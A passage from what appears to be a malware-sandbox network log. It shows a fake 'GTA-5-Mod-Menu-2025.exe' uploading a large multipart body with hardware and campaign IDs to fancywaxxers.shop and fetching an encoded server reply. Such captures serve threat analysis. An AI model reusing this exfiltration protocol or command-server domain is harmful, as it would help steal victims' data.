                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1613&rtt_var=605&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2132&delivery_rate=1810291&cwnd=238&unsent_bytes=0&cid=c4aa9a134aea5dec&ts=2208&x=0"
                                                                  2024-12-30 19:41:07 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                  Data Ascii: fok 8.46.123.189
                                                                  2024-12-30 19:41:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.649712104.21.96.14436216C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 19:41:08 UTC282OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=95Z0Z9TD6C7TMHMM
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 572287
                                                                  Host: fancywaxxers.shop
                                                                  2024-12-30 19:41:08 UTC15331OUTData Raw: 2d 2d 39 35 5a 30 5a 39 54 44 36 43 37 54 4d 48 4d 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 42 42 31 39 45 34 39 32 31 42 34 39 38 31 45 33 44 45 42 33 35 34 37 30 42 33 39 43 31 0d 0a 2d 2d 39 35 5a 30 5a 39 54 44 36 43 37 54 4d 48 4d 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 35 5a 30 5a 39 54 44 36 43 37 54 4d 48 4d 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a
                                                                  Data Ascii: --95Z0Z9TD6C7TMHMMContent-Disposition: form-data; name="hwid"ACBBB19E4921B4981E3DEB35470B39C1--95Z0Z9TD6C7TMHMMContent-Disposition: form-data; name="pid"1--95Z0Z9TD6C7TMHMMContent-Disposition: form-data; name="lid"yau6Na--899083440
                                                                  2024-12-30 19:41:08 UTC15331OUTData Raw: 8d b1 a9 08 92 75 e7 eb 15 1b 04 69 0e d1 1d ad 48 b5 15 ee 8b d5 e0 72 cc 35 d4 3b 97 1f dd f1 9d fe 53 d2 e5 b5 82 46 a4 0f ec e9 81 a8 df 36 4e c7 2a 0f 66 27 24 a8 ec ad 67 2d ea 85 9d 8e 7c 38 7b a8 4d 13 42 cf fb bc 53 81 ca 9b bc 62 21 17 94 e8 22 b5 04 41 65 b3 b9 4a 05 80 af b8 d9 64 bd f8 e8 f0 a4 3a 0f 33 cb 5c fa a5 8a 3f 94 5e b6 37 3c eb b9 68 2a 91 29 88 a0 6e b8 08 ff 7a 19 e6 08 96 ab 6f 9e 1b fe d9 c1 ca 78 45 9f 5d e5 05 bb 49 80 ea 19 09 96 f9 16 b3 b0 16 b8 2d eb f9 d4 d5 f4 f8 9b 32 32 f7 7a d3 da 59 6b 08 c1 aa eb f5 83 2f 57 ec 11 54 65 8b ff ef 61 cc 5e 2c 8c 0c c6 90 b5 d9 d3 00 e2 5e 35 9b 0f bb 02 4b 44 9b dc bc 8a 19 9e 8e 63 55 98 ab cb 52 ed 67 86 f2 6e e1 f3 19 da 79 53 dd 16 20 1f 87 e9 45 c2 bd bf 9d fa 66 21 ea eb b1 00
                                                                  Data Ascii: uiHr5;SF6N*f'$g-|8{MBSb!"AeJd:3\?^7<h*)nzoxE]I-22zYk/WTea^,^5KDcURgnyS Ef!
                                                                  2024-12-30 19:41:08 UTC15331OUTData Raw: 3b 56 48 7c 70 bc 17 0b 6c 80 3d c0 f2 f8 7b cb b8 39 4d 0b e9 19 df 19 ff a9 66 16 14 f1 d4 b1 f9 01 e0 9e fb c9 ea fa c9 6b a0 8f 86 ff 3c e6 ad 3c 26 9a 1e a3 b9 e3 fa ab af 5e 17 fd a8 57 d9 d9 09 63 a5 2e 33 44 71 3c 23 fd 78 ed e4 31 49 24 1c c4 37 76 e5 f2 b1 7f 9e 85 be 4d cf 75 6e b2 bf 88 b2 94 0a 01 f7 29 f7 97 1f 4b 67 39 3d d2 c3 f1 89 29 1e e2 ee 16 83 4b 68 86 a1 04 28 d9 6d b2 27 f0 0c 1e 9f 70 61 69 e8 9f 78 d1 53 45 91 fb 0b 92 3c 60 b8 52 f7 45 f9 8a e0 8f 81 fe dc 7a fd a1 1f d6 82 f4 e2 48 69 61 e1 d9 4a d7 50 13 5e d1 f7 68 c2 d3 26 b8 a1 78 ac 19 a7 34 6e 0f 02 3f 68 f0 25 bc 23 44 84 bd 30 54 52 60 98 75 46 79 51 75 5b 2a 58 39 c7 ff 7c da 45 5c 1b ea b1 3e 31 7b ef de 9e 96 df 3c d2 6b 98 87 6f af 5d 77 77 b9 61 f1 75 94 f4 bd da
                                                                  Data Ascii: ;VH|pl={9Mfk<<&^Wc.3Dq<#x1I$7vMun)Kg9=)Kh(m'paixSE<`REzHiaJP^h&x4n?h%#D0TR`uFyQu[*X9|E\>1{<ko]wwau
                                                                  2024-12-30 19:41:08 UTC15331OUTData Raw: ff 62 42 f6 bf ad 2b 49 55 63 5c c5 fe 52 36 77 b2 ac 3f c8 45 b3 33 f1 f3 84 30 d7 ad ca fe e2 e2 91 2d d7 14 f1 14 f1 57 6a b3 4f 8a 99 e5 ca ff 6e 44 fa 71 e5 39 39 34 86 f5 af 0e d9 6f 06 1d e3 2d d4 5b 1e 28 d4 cc 61 ac 7d fd 6e 15 7b 88 ce 43 cd 45 9f 72 70 5c 75 0a 3f b4 31 e0 7e 5f f1 9e e6 a2 93 7c 72 d4 27 8d 97 2d 3f b1 37 6f 6d 3a 29 f5 7c ea 7d 63 a4 4e 0f ee cb 00 e4 3a 78 ad 14 35 b9 f5 72 e3 dd 98 16 9a 65 30 db c9 19 b8 a5 b3 2e 20 11 97 f7 23 83 5b 17 fd 49 d1 f8 11 5c df ee ef 20 0a 6a 7e 06 f7 9d fe ab 8e c3 9f 61 49 ef cd 16 29 94 b8 c4 0e 5f 6b d7 b4 d7 00 46 b0 c9 61 e1 b8 27 e1 07 ca 16 6f d1 6f f0 01 68 4e e2 80 35 31 95 b3 47 99 74 72 6e 51 75 d3 a0 9a c1 bc 30 22 13 f3 22 29 34 6a 54 88 22 74 a2 b6 65 c5 40 fe c1 a3 98 c6 e0 9a
                                                                  Data Ascii: bB+IUc\R6w?E30-WjOnDq994o-[(a}n{CErp\u?1~_|r'-?7om:)|}cN:x5re0. #[I\ j~aI)_kFa'oohN51GtrnQu0"")4jT"te@
                                                                  2024-12-30 19:41:08 UTC15331OUTData Raw: 2f bc f5 4a 3a 3d 90 d1 52 d0 7f 7f c2 e5 8e 5f 06 67 05 0b 4f 9e a7 5b 09 dd 92 ca a9 d1 8f d1 8a 49 ac a2 5f 38 39 0d 7e f8 43 6f 4d b1 4a 21 b1 88 bf e0 e0 f2 7f 8d 7e 08 28 bc cb 5f 98 87 b9 80 01 5b 68 60 e0 03 cd 9b 23 64 99 53 8c 10 e9 56 d5 67 90 54 8f d7 4b df aa 43 c8 3c 68 38 82 a2 1f 9d fb 41 3f 9b c2 68 08 ef 13 c5 8f bc f5 35 d6 e7 78 ab 75 55 70 f0 2b ba 06 b6 2f 3e 77 cc 49 5e 15 17 44 c8 3c 7e 68 e2 1c ec 81 6f 94 18 4a ce 15 42 b8 ac 89 d3 58 16 b0 cd 90 5e 3a 33 94 5d 0c 78 81 34 e3 95 18 8f 08 78 8f 3f fa a2 7a 7b 25 dd 81 6a 22 63 72 92 bf 1c 3c cb 2e b8 8c 86 f9 04 d4 c1 cb 5c 9b 09 e8 14 1f 76 ed c9 8f aa d4 51 64 0e 36 2f 16 ff 74 43 d4 9e 71 2c 35 45 1c ef af 9d 59 c1 d9 87 8d 2c 91 77 80 32 7d 40 89 97 e8 9b 36 a1 fb a4 1a 63 60
                                                                  Data Ascii: /J:=R_gO[I_89~CoMJ!~(_[h`#dSVgTKC<h8A?h5xuUp+/>wI^D<~hoJBX^:3]x4x?z{%j"cr<.\vQd6/tCq,5EY,w2}@6c`
                                                                  2024-12-30 19:41:08 UTC15331OUTData Raw: 3a 4b c0 49 3c 69 50 e9 55 73 53 15 85 09 5e 35 68 ed 1f b0 3d 47 2f b5 19 cf dc 98 94 bc 20 ae ef bb e2 ea 75 90 ea 35 ab 24 17 11 28 74 98 d4 ec 18 46 1e c9 2e b4 19 99 57 dc 2f 5a 5d 65 f9 b5 d3 d8 ff a2 f6 a4 d1 a2 bb 57 4f 83 d1 2b 4c 34 68 2e e2 4c fe 3a 58 e7 7a 53 92 25 22 5c 79 26 c9 5d 2d 86 74 63 54 90 52 03 9f 61 3d 88 b8 29 b6 81 65 b7 fe a2 27 63 c7 23 d2 0b c0 98 c1 a6 be 5c b3 1e ef 7b b9 65 5c e0 69 52 4f 54 88 e5 b9 5b 8e bb 6e 14 b0 6c dd 32 cc ab 8c 77 29 9d a3 49 2e c4 50 53 99 cb 27 e3 ac ac 94 32 94 fb 62 33 c4 c4 e2 65 be ac fe ac cf 61 f2 f2 ff 20 9d a7 dd 9c c5 dc 97 9d d4 db dc 77 8e b5 95 21 f4 49 4e 6b 09 3c 89 6b 33 80 cf b2 dd 54 19 a5 92 cf 14 92 d4 05 f8 6a c2 7e b1 1a fe 11 a9 32 71 c2 55 e5 77 13 bc 05 0e 79 73 3a 4d 9d
                                                                  Data Ascii: :KI<iPUsS^5h=G/ u5$(tF.W/Z]eWO+L4h.L:XzS%"\y&]-tcTRa=)e'c#\{e\iROT[nl2w)I.PS'2b3ea w!INk<k3Tj~2qUwys:M
                                                                  2024-12-30 19:41:08 UTC15331OUTData Raw: 54 3f e7 e7 42 ea 6c 91 76 de b8 f1 62 bd 44 ce 18 bc fa 1f 5e 32 35 a7 18 2d 22 f0 c3 dc 1f a5 a9 dd 26 03 7f f5 10 f0 fb 94 1a 08 c4 96 7e 79 e6 dd 99 77 5d 4d bd cc 3e 75 66 30 f3 1a f5 8e 50 05 f0 f7 43 77 9f a6 9a 7f 25 82 df e5 be 4b 8f 1e 53 67 df ca 69 ef df 45 04 cd 86 60 ed 9e 0c 3c 89 b3 c7 93 e6 7c 36 b4 e4 60 8b c5 4d f3 74 5b 0f ae ce de ec 6b d4 c8 0a 52 63 eb 99 88 8f 93 97 37 b4 ce d1 a3 61 59 2c 8e 6d b1 a1 45 a2 9e 60 b5 5c e7 b4 b4 67 5e 25 a7 6c 48 5d 87 0e 26 44 b9 fb 3e dd 36 e7 91 4c 8c aa da e6 60 e0 e6 33 5c ad 91 ec d7 e4 91 5c 79 46 12 f6 74 d2 1e 29 93 dd 75 fa 09 12 da a1 f9 41 80 09 1b 79 14 cf 08 40 5d 91 c1 67 50 05 08 97 9c e8 33 d3 e4 f0 37 ba 76 4e f0 bc 2e c2 cf 05 ec a0 97 92 b0 5f ae 84 09 52 0e 0d 29 28 a7 95 72 fd
                                                                  Data Ascii: T?BlvbD^25-"&~yw]M>uf0PCw%KSgiE`<|6`Mt[kRc7aY,mE`\g^%lH]&D>6L`3\\yFt)uAy@]gP37vN._R)(r
                                                                  2024-12-30 19:41:08 UTC15331OUTData Raw: dc 51 66 5e 09 fa 75 80 f6 c3 8e b5 39 ff 4e be 43 0e 37 71 d5 a1 3d 04 17 85 c8 cc fe cb c0 a6 d2 e9 9c 5e 3e f3 dd 86 7b 10 7e 9f cb 38 8c 9e 85 46 f5 bf 94 eb 03 c1 78 1c 90 07 1e 60 5f d3 e6 0b b5 27 49 56 85 a6 bc 36 25 fb 36 00 e4 e0 fe f7 01 e7 41 0e ef 9c b1 93 20 d9 f7 61 2a 5a 7b 2c b0 cf ef 86 c7 70 09 54 a1 97 5f af 06 91 4b e7 7e ad f7 e5 c5 26 25 db e2 02 d0 fd 6d 2e eb 63 b8 ac b8 8d 36 d1 f5 4c de fc 42 dd 45 dd bb 12 4c 19 e0 b0 62 f8 4f 00 27 8a e1 6d d6 8c 64 9c 39 31 f6 84 67 b8 64 d1 72 40 07 ae ca b2 59 5e f4 d5 c7 3c e7 3c 60 77 47 f6 16 df 4e 88 a0 34 0c b1 fe 9d c3 ad 36 5c 72 9d 85 40 03 0b 66 86 23 9d 32 6f df 8d 76 13 9f 2f da 5d de d6 96 52 be 97 bb be 31 c7 eb 56 ab e2 84 50 6c bf 17 e9 33 64 1c a3 58 f7 b2 35 20 10 b5 cc ea
                                                                  Data Ascii: Qf^u9NC7q=^>{~8Fx`_'IV6%6A a*Z{,pT_K~&%m.c6LBELbO'md91gdr@Y^<<`wGN46\r@f#2ov/]R1VPl3dX5
                                                                  2024-12-30 19:41:08 UTC15331OUTData Raw: 9b 46 ea c3 13 74 f1 70 1d e6 de e3 f9 c1 ed 51 5c bd c8 44 64 42 80 f2 a2 fc e6 70 3d 37 51 87 41 ac 60 33 25 51 cc 96 d5 ea de 4a de b8 c8 bb 05 b7 f8 38 73 38 71 76 00 3b 0b a9 22 64 54 8f dc 0c dd 47 56 21 b9 b5 db 7a 8a 15 3e fe fb 6f 7a 1d 3a ff ab cb 11 aa 34 76 ff ec ab 79 2d 34 78 3f 6d ce 07 c8 d9 06 dc d3 14 14 62 ed d9 6f 70 65 5b 86 0f 3d 10 7d de d6 73 8e ad 23 e5 ad 07 12 ee d3 d2 fc b8 a2 01 60 73 0f 83 b9 56 1f 49 64 10 19 26 9a eb 0c 09 5f 92 82 e8 a5 c0 2e 43 54 48 85 31 82 18 0f 0b 21 4a b2 7c 57 6e b9 1e a1 85 cd 16 85 d4 68 b6 ae a9 61 df 95 80 ee 55 af ac 68 07 24 78 1a 90 f6 c6 ad c6 a6 d3 5f d9 43 e0 d3 1e 53 d7 6d 92 a4 ec 3a 13 74 ec cf 95 3c cd 3a 65 81 1b bd a9 ed 36 ce d1 ab cd eb b0 a7 48 e3 34 43 1e 9c f4 5c dd 3e 3e f2 3e
                                                                  Data Ascii: FtpQ\DdBp=7QA`3%QJ8s8qv;"dTGV!z>oz:4vy-4x?mbope[=}s#`sVId&_.CTH1!J|WnhaUh$x_CSm:t<:e6H4C\>>>
                                                                  2024-12-30 19:41:08 UTC15331OUTData Raw: e7 7d 26 77 a0 48 75 3d 6e ba 3d 80 cb 36 ef 17 a6 0a 5f f7 6a 8e e1 dd 20 70 4f db 48 4f 23 c1 37 e7 d3 ac 34 be f2 a2 36 7e af 92 f1 e7 8e 6a b4 0c 94 f4 d9 c9 03 36 bf 23 27 1f 89 89 0c de fc 6b 9e 3f bc e7 61 7d 42 c4 ba 90 15 d2 ad be d5 71 36 1b 66 4b b2 84 51 40 fe d7 68 fe 0d 6b 67 96 c1 d1 2b 2c 11 f0 74 87 f3 af e4 8b 47 72 9c 85 19 99 b6 74 33 e3 4d 3c 5b 1c 65 55 e5 ca af eb 94 6a 21 bd bc a5 6d 64 4f 51 ed 09 c5 87 82 8d 27 48 0f b5 49 e5 1a 55 08 f2 56 7c ed fe e8 a9 ae cd 08 5d 5d f0 49 f4 d8 e3 ff 3e 26 4b c6 12 79 ca 8a 89 9a e2 0d 8a f4 86 b2 95 a2 e5 ef 58 99 39 cf 8a ea 0b 3f bc c3 eb 67 32 17 d8 1b 5c fb 98 4f 06 a3 61 73 2d e5 e1 44 af bf 99 1b a3 25 ec e0 c0 51 df 39 ca 80 c5 9f b5 4d ae 53 be c5 2e 93 0e 0a 2b 1b 8b 4f 10 63 ae 11
                                                                  Data Ascii: }&wHu=n=6_j pOHO#746~j6#'k?a}Bq6fKQ@hkg+,tGrt3M<[eUj!mdOQ'HIUV|]]I>&KyX9?g2\Oas-D%Q9MS.+Oc
                                                                  2024-12-30 19:41:10 UTC1145INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 19:41:10 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=uirrdiejf8bcp65cqh9sj8giua; expires=Fri, 25 Apr 2025 13:27:48 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 1; mode=block
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7i%2BgmY4YzRv%2BdG1po3POHjZocJHdY2evmUvwRjt%2FLwRvVEGfQrv%2Fpo%2B5nebrfz4cf5xxGPUXv3%2BdnCtRg%2FmPTFuUMktoIu9Klsf4ultC5wKIjd0fNHhwuL0G0B0XOoeRvu1o4A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa4816fdf39c32e-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1667&rtt_var=632&sent=199&recv=592&lost=0&retrans=0&sent_bytes=2844&recv_bytes=574833&delivery_rate=1720683&cwnd=178&unsent_bytes=0&cid=bb82b7264940a007&ts=1760&x=0"


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.649728104.21.96.14436216C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 19:41:10 UTC265OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 86
                                                                  Host: fancywaxxers.shop
                                                                  2024-12-30 19:41:10 UTC86OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 26 6a 3d 26 68 77 69 64 3d 41 43 42 42 42 31 39 45 34 39 32 31 42 34 39 38 31 45 33 44 45 42 33 35 34 37 30 42 33 39 43 31
                                                                  Data Ascii: act=get_message&ver=4.0&lid=yau6Na--899083440&j=&hwid=ACBBB19E4921B4981E3DEB35470B39C1
                                                                  2024-12-30 19:41:11 UTC1131INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 19:41:11 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=cs16stiupgq72paf8vumvq67b4; expires=Fri, 25 Apr 2025 13:27:49 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 1; mode=block
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MBpvWn4zbY0TgazI0oZ3ZJTog5F3wX1mhSUgTuRzcJdPMKPOKDVFTY8Dg6Zx%2BQy%2Fl1rORimyWVSt8cUyOsoSWmrAjxloecHrs3RIbxDDpds7UwNeW57%2BKVOdvqhl0sJX4W%2BNCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa4817decf41a48-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1904&min_rtt=1895&rtt_var=730&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=987&delivery_rate=1479979&cwnd=157&unsent_bytes=0&cid=fa827ac530fe2a8c&ts=462&x=0"
                                                                  2024-12-30 19:41:11 UTC238INData Raw: 33 36 35 38 0d 0a 69 78 33 38 74 6c 6d 45 43 74 42 77 36 4d 78 68 51 4c 76 6d 4e 32 49 57 39 58 63 33 36 42 53 35 61 73 4f 6f 44 68 6f 67 6f 6c 62 51 5a 74 37 51 4c 61 59 77 34 56 7a 4b 71 55 4e 36 69 73 6f 56 42 6a 54 50 56 56 2f 5a 63 4f 41 47 6b 4a 35 72 58 6d 62 4e 4d 4e 4a 74 7a 65 63 54 33 47 69 61 45 36 2f 2f 41 68 44 66 31 58 6b 36 52 72 68 50 65 59 46 52 38 67 61 49 30 46 64 53 65 75 34 64 7a 30 36 2f 34 42 57 78 50 70 30 6e 67 4c 67 49 4c 75 32 6e 57 77 5a 6c 6d 51 42 56 6a 47 4f 41 57 61 43 5a 62 53 4a 61 32 6d 54 43 54 49 33 6a 4b 38 4a 74 74 42 75 48 71 44 6b 58 38 62 4e 43 44 48 47 4e 46 6e 2f 61 58 39 30 2f 67 50 34 38 59 33 6a 67 49 72 68 5a 7a 39 49 6a 30 6e 43 71 49 4b 79 56 43 51 50 4c
                                                                  Data Ascii: 3658ix38tlmECtBw6MxhQLvmN2IW9Xc36BS5asOoDhogolbQZt7QLaYw4VzKqUN6isoVBjTPVV/ZcOAGkJ5rXmbNMNJtzecT3GiaE6//AhDf1Xk6RrhPeYFR8gaI0FdSeu4dz06/4BWxPp0ngLgILu2nWwZlmQBVjGOAWaCZbSJa2mTCTI3jK8JttBuHqDkX8bNCDHGNFn/aX90/gP48Y3jgIrhZz9Ij0nCqIKyVCQPL
                                                                  2024-12-30 19:41:11 UTC1369INData Raw: 73 6d 49 31 56 4d 63 6b 58 72 31 2b 30 41 65 36 6e 48 39 59 65 73 46 39 75 57 32 4c 31 57 2f 43 62 37 51 33 71 5a 38 58 43 4e 72 55 61 30 31 62 77 43 56 34 76 69 54 4f 47 2f 71 51 50 69 68 44 2f 6e 6d 34 5a 35 6a 4d 4b 2f 4e 4f 70 51 6a 64 67 69 56 34 39 39 34 45 49 48 36 36 4c 55 65 35 56 66 55 6b 6d 64 31 42 56 42 53 61 4c 50 4e 77 70 76 63 6f 30 54 36 57 47 37 4b 6e 45 77 33 6e 79 58 6f 79 58 34 41 5a 55 4a 42 31 38 56 69 49 7a 46 74 58 64 70 41 76 75 6c 75 52 68 51 33 55 62 71 6f 6c 6b 72 59 78 42 4f 4b 55 64 42 4a 46 68 69 42 31 32 6b 66 52 57 71 66 78 59 6b 6b 57 37 52 4c 4e 63 70 72 76 4b 62 56 62 6d 69 69 4b 68 6a 67 48 69 4b 74 6e 42 69 57 37 4c 30 47 6c 4c 50 51 70 68 75 4e 69 55 56 6a 37 48 74 46 57 76 75 42 6f 37 56 79 63 41 4e 79 42 4e 69 69
                                                                  Data Ascii: smI1VMckXr1+0Ae6nH9YesF9uW2L1W/Cb7Q3qZ8XCNrUa01bwCV4viTOG/qQPihD/nm4Z5jMK/NOpQjdgiV4994EIH66LUe5VfUkmd1BVBSaLPNwpvco0T6WG7KnEw3nyXoyX4AZUJB18ViIzFtXdpAvuluRhQ3UbqolkrYxBOKUdBJFhiB12kfRWqfxYkkW7RLNcprvKbVbmiiKhjgHiKtnBiW7L0GlLPQphuNiUVj7HtFWvuBo7VycANyBNii
                                                                  2024-12-30 19:41:11 UTC1369INData Raw: 6c 57 46 4a 45 53 2f 56 6f 73 35 71 35 6c 71 51 30 7a 78 59 4f 35 5a 75 74 6b 2f 33 58 72 68 49 61 4b 55 41 77 72 59 6f 51 51 42 52 70 46 45 65 62 42 45 39 46 4b 4e 77 55 74 52 54 4f 6b 75 30 6c 57 6d 2f 52 48 53 4f 37 6b 6d 70 4c 78 56 44 65 79 4f 44 67 74 34 6f 7a 5a 62 6a 47 66 56 48 61 48 4d 65 53 4d 54 77 57 66 6f 4a 59 62 42 61 38 31 62 6f 53 57 61 69 67 59 6b 30 49 6c 54 4f 6b 47 2f 49 6b 4b 47 63 38 45 4c 69 35 70 46 66 6e 58 68 41 4c 6c 6b 70 50 51 74 74 30 37 6a 46 4a 4b 61 47 7a 72 72 6f 6d 34 4b 56 59 55 6b 52 4c 39 57 69 7a 6d 72 6d 57 70 44 54 50 46 67 37 6c 6d 36 32 54 2f 64 65 75 45 68 6f 70 51 44 43 74 69 68 42 41 46 47 6b 55 52 35 73 45 54 30 55 6f 33 42 53 31 46 4d 36 53 37 53 56 61 62 39 45 64 49 37 75 53 61 6b 76 46 55 4e 37 49 34 4f
                                                                  Data Ascii: lWFJES/Vos5q5lqQ0zxYO5Zutk/3XrhIaKUAwrYoQQBRpFEebBE9FKNwUtRTOku0lWm/RHSO7kmpLxVDeyODgt4ozZbjGfVHaHMeSMTwWfoJYbBa81boSWaigYk0IlTOkG/IkKGc8ELi5pFfnXhALlkpPQtt07jFJKaGzrrom4KVYUkRL9WizmrmWpDTPFg7lm62T/deuEhopQDCtihBAFGkUR5sET0Uo3BS1FM6S7SVab9EdI7uSakvFUN7I4O
                                                                  2024-12-30 19:41:11 UTC1369INData Raw: 31 78 6b 6d 37 70 4a 70 76 4c 58 48 39 6d 31 47 62 76 52 38 75 48 45 75 31 6b 73 52 69 77 76 53 6f 47 6a 62 4e 35 45 48 71 73 49 67 61 43 55 38 45 54 6a 73 46 39 55 46 66 47 5a 39 68 65 6f 4a 6b 6a 37 58 6d 57 4e 70 69 35 44 33 54 57 31 6e 77 6b 59 35 59 55 61 38 64 47 69 6c 71 53 36 6b 70 39 56 4f 6b 4b 70 48 79 56 34 79 6a 38 4d 72 77 6f 6e 5a 51 4c 45 76 79 36 47 43 34 69 67 55 52 42 76 6d 62 57 51 66 76 77 52 69 4a 42 36 6d 62 65 66 49 6a 73 50 74 35 63 76 69 65 41 70 52 4e 35 79 64 46 65 4c 30 72 61 48 48 50 66 49 4e 56 62 38 75 5a 32 62 57 33 49 4d 37 4a 50 6d 4d 49 68 73 56 69 53 4d 71 50 35 49 69 33 4b 6e 6b 42 61 5a 36 30 51 42 62 39 62 7a 31 69 73 78 45 31 43 64 35 45 6c 32 33 37 4f 78 42 62 30 58 34 4d 2f 76 50 6f 75 4c 50 43 65 62 69 70 4d 75
                                                                  Data Ascii: 1xkm7pJpvLXH9m1GbvR8uHEu1ksRiwvSoGjbN5EHqsIgaCU8ETjsF9UFfGZ9heoJkj7XmWNpi5D3TW1nwkY5YUa8dGilqS6kp9VOkKpHyV4yj8MrwonZQLEvy6GC4igURBvmbWQfvwRiJB6mbefIjsPt5cvieApRN5ydFeL0raHHPfINVb8uZ2bW3IM7JPmMIhsViSMqP5Ii3KnkBaZ60QBb9bz1isxE1Cd5El237OxBb0X4M/vPouLPCebipMu
                                                                  2024-12-30 19:41:11 UTC1369INData Raw: 73 7a 6c 79 62 36 6a 64 76 54 2b 30 4b 70 47 65 59 30 79 2f 44 54 70 73 66 32 49 59 55 4f 76 4f 6b 42 54 46 2f 75 6a 56 57 30 43 4c 4e 44 34 4b 52 4f 58 74 35 6c 32 66 61 62 59 37 69 46 64 67 6c 67 53 61 43 75 43 4d 77 39 49 30 4f 4c 48 65 42 45 30 43 35 65 5a 4a 42 70 4d 5a 69 56 57 61 51 50 72 39 73 6a 49 51 73 31 47 61 71 53 4b 32 45 45 43 66 6e 79 56 49 37 5a 35 41 30 48 4c 42 48 37 43 50 32 7a 56 49 31 61 4d 77 6a 78 33 62 46 38 78 2f 43 50 75 6b 62 6d 4b 67 34 43 4f 33 57 58 79 6c 43 78 55 39 61 6d 45 44 57 58 34 6a 72 65 6d 4a 57 38 32 4f 36 57 63 2f 53 43 4d 59 68 67 41 53 77 68 53 63 42 30 74 4e 47 45 6a 32 2f 41 32 65 46 49 65 41 47 6b 4a 78 6d 49 32 76 36 4d 65 56 4f 73 39 74 72 36 32 48 69 48 64 75 50 56 78 65 4d 6b 30 55 74 5a 71 41 6b 65 4c
                                                                  Data Ascii: szlyb6jdvT+0KpGeY0y/DTpsf2IYUOvOkBTF/ujVW0CLND4KROXt5l2fabY7iFdglgSaCuCMw9I0OLHeBE0C5eZJBpMZiVWaQPr9sjIQs1GaqSK2EECfnyVI7Z5A0HLBH7CP2zVI1aMwjx3bF8x/CPukbmKg4CO3WXylCxU9amEDWX4jremJW82O6Wc/SCMYhgASwhScB0tNGEj2/A2eFIeAGkJxmI2v6MeVOs9tr62HiHduPVxeMk0UtZqAkeL
